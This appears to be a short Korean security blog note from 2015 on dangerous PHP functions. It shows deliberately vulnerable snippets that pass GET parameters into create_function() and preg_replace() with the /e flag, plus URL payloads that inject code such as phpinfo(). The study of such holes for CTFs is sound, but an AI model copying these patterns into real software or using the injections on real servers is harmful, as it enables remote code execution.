webhacking/etc

php 취약 함수 관련

qkqhxla1 2015. 8. 21. 17:35

일반적인 취약한 함수.

http://stackoverflow.com/questions/3115559/exploitable-php-functions

http://web.securityinnovation.com/appsec-weekly/blog/bid/79067/Disable-Dangerous-Functions-in-PHP

http://blog.naver.com/postmebi/90173864551

등등 검색하면 많이나옴.


요런것도 있다.

http://www.80sec.com/php-create_function-commond-injection-vulnerability.html

create_function()으로도 쉘 실행시키는게 가능하다고 함.


서버 구성.(index.php)

<?php
create_function('$a', 'return $a[0];}' . $_GET['a'] . ';/*];');
?>

아래처럼 보내보면 phpinfo()가 실행된다.

http://localhost/index.php?a=phpinfo();


워게임이나 ctf에 자주 보이는 preg_replace()도 주의할것. e옵션으로 php함수 실행 가능.

구분자가 //인데 //말고 {}등의 다른 구분자도 쓰일 수 있음.

<?php preg_replace("//e",$_GET[foo],"");?>


http://localhost/index.php?foo=phpinfo()

처럼 실행.

'webhacking > etc' 카테고리의 다른 글

codeshell.kr adm1nkyj trick 1, 2  (0) 2015.08.25
이전 ctf연구 (hack.lu)  (0) 2015.08.22
codeshell.kr hash col, dummy 64  (0) 2015.08.10
byte flipping attack 문서 번역, 실습  (0) 2015.08.05
php wrapper (추가예정)  (0) 2015.07.28